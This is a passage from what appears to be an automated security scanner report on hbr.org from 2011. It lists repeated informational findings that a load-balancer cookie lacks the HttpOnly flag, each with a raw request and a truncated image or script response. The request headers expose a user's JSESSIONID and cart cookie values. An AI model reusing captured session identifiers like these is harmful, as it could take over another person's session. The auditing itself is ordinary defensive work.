HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:39 GMT Server: Apache Last-Modified: Tue, 27 Sep 2011 19:26:22 GMT ETag: "f0752-1a4d-4adf140291380" Accept-Ranges: bytes Content-Length: 6733 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:39 GMT LEG: 5 Content-Type: image/gif GIF89a,.d.....].......ppq......ZWX......|||1-..........LIJ..........HG............?;<.yv.......\Z...vsthef................................W33......dde...XXY0$%.a_.kh@.....q==...=)*.WU....RP q.0{.J......[SNIP]...
6.29. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_buzz.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_buzz.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_buzz.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d7e-f59-4a88879e65740" Accept-Ranges: bytes Content-Length: 3929 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Yy.\.y..w..cwfg....@+..$$\..B..U...9.*.B.S...vl....`b...!c |a.`S.(\%.v.A.R.......t`....vwv..9.....{f.h) p\.?.....{o......[SNIP]...
6.30. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_facebook.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_facebook.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_facebook.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:26 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d81-a28-4a88879e65740" Accept-Ranges: bytes Content-Length: 2600 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:26 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<.. .IDATx..Y[o\...k.../......P I ..J*DU. o/..#.U.../..T.S...U....RA.H+..R. .B...\.b;6....g....}.c.u..3.........:...00...!....tI:....[SNIP]...
6.31. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_iphone.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_iphone.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_iphone.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d82-b54-4a88879e65740" Accept-Ranges: bytes Content-Length: 2900 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<.. .IDATx..Y[oT..>...........v......< .".N..H<,...e.....).....E6H......a...`yl...=..~.u..v.1J...t.........7.C.pi4.x.=.......u.].e...[SNIP]...
6.32. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_linkedin.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_linkedin.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_linkedin.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d83-c90-4a88879e65740" Accept-Ranges: bytes Content-Length: 3216 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<...2IDATx..YI.$G.......i3...c..A`3..@BX\.....p......8s. ......YN....#.1.c......*.x........[dWgeeFf|...-iSJ.....I6Smz..zL.............[SNIP]...
6.33. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_newsletters.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_newsletters.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_newsletters.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d84-c00-4a88879e65740" Accept-Ranges: bytes Content-Length: 3072 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Yyl....Y?_.@.&...`..\6...8.FB.."... .B......M.&.QS.B.P..BKU... (44... .....M...U..]{L..ovvv.."u..o.......3..j.Fy#......[SNIP]...
6.34. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_rss.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_rss.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_rss.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d85-bfe-4a88879e65740" Accept-Ranges: bytes Content-Length: 3070 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Yk.]U.^k.{....S.....@Z:.* `...<.#Fb..b0"j....!Q....1... ...!...55.D1.%4.wCh+....s:3.1...\{...y.).'w..{.>g.[k}k.}..`......[SNIP]...
6.35. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_twitter.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_twitter.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_twitter.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d86-af8-4a88879e65740" Accept-Ranges: bytes Content-Length: 2808 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<.. .IDATx..Yo.]G.?3..{o..e.n.m..6Z.)1mh1.B.Uh..~... E...U..Z,._.....")(HQ.......A!.V....&Y.....{....g..9w.}o....w..{f.w...;...Zk...[SNIP]...
6.36. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_youtube.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_youtube.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_youtube.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d87-d07-4a88879e65740" Accept-Ranges: bytes Content-Length: 3335 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y{.U.......}..ED..Vk.\...j[h).i..MS....h..b...cy..!.[.....M ....0Zl....J......u.{.>.........;{....@..9g..o..o...<.C......[SNIP]...
6.37. http://hbr.org/hbrg-main/resources/images/marketing/sub-touts/sub_tout_10062011.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sub-touts/sub_tout_10062011.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sub-touts/sub_tout_10062011.jpg HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://web.hbr.org/iframe/hbr_topright.php Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:34 GMT Server: Apache Last-Modified: Thu, 06 Oct 2011 22:30:31 GMT ETag: "1bdd9c-cbe4-4aea8df4dcfc0" Accept-Ranges: bytes Content-Length: 52196 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:34 GMT LEG: 5 Content-Type: image/jpeg ......Exif..MM.*.............................b...........j.(...........1..... ...r.2...........i............... ....'.. ....'.Adobe Photoshop CS5.1 Macintosh.2011:09:21 21:26:08..........................[SNIP]...
6.38. http://hbr.org/hbrg-main/resources/images/mastheadNavBg_w11.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/mastheadNavBg_w11.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/mastheadNavBg_w11.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/css/style.css Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:31 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:23 GMT ETag: "68233-13b2-4a8887a04dbc0" Accept-Ranges: bytes Content-Length: 5042 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:31 GMT LEG: 5 Content-Type: image/gif GIF89a..i....xvv........................nmm........................?==BAAecc....PNNHFFRPP]\\kii[YY......533!.......,......i.....'.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n....|N....[SNIP]...
6.39. http://hbr.org/hbrg-main/resources/images/mastheadSearchForm_submit.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/mastheadSearchForm_submit.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/mastheadSearchForm_submit.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:30 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:23 GMT ETag: "67ede-237-4a8887a04dbc0" Accept-Ranges: bytes Content-Length: 567 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:30 GMT LEG: 5 Content-Type: image/gif GIF89aQ.......Sj..1...........................................2L.......E\.au.........."?.x............!......!.......,....Q...... .xdi.h..l.6."7...x..|..@....yl..r..6EOsJ.......... ..K.....'....G.L....[SNIP]...
6.40. http://hbr.org/hbrg-main/resources/images/store_header.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/store_header.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/store_header.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:26 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:21:07 GMT ETag: "67f0b-8d7-4a8887ca43ec0" Accept-Ranges: bytes Content-Length: 2263 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:26 GMT LEG: 5 Content-Type: image/gif GIF89a.............EBB`]].........zxx............mjkSOP845...!.......,.............I..8....`(.di.&..l..p\.rm.0..|+.T.G,...b..l:....(p.I...X.jc.o.A......I.4..F. ......pa..Fku.w.y<G~..,a.Eq......D.; U....[SNIP]...
6.41. http://hbr.org/hbrg-main/resources/scripts/coremetrics/cmdatatagutils.min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/coremetrics/cmdatatagutils.min.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/coremetrics/cmdatatagutils.min.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT Server: Apache Last-Modified: Thu, 22 Apr 2010 01:56:55 GMT ETag: "67f29-2f7c-484c9a007c7c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:18 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 12156 Content-Type: application/x-javascript <!-- var cm_exAttr=new Array;var cm_ClientID="90105883";var cm_TrackLink="A";var cm_TrackImpressions="R";var cm_JSFEnabled=false;var cmJv="1.0";if(typeof(isNaN)=="function")cmJv="1.1";if(typeof(isFin...[SNIP]...
6.42. http://hbr.org/hbrg-main/resources/scripts/coremetrics/v40/eluminate.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/coremetrics/v40/eluminate.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/coremetrics/v40/eluminate.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT Server: Apache Last-Modified: Tue, 13 Sep 2011 18:11:18 GMT ETag: "6801c-7876-4acd691ec3d80" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:18 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 30838 Content-Type: application/x-javascript /*Copyright 2000-2005,Coremetrics 4.2.7-b $Revision:111657 $*/if(!cGB){var cGB=true;if(!cm_ClientID){var cm_ClientID="99999999";}if(!cm_HOST){var cm_HOST="test.coremetrics.com/cm?";}if(!cm_ClientTS){v...[SNIP]...
6.43. http://hbr.org/hbrg-main/resources/scripts/hbrg/google_book_preview_check.js
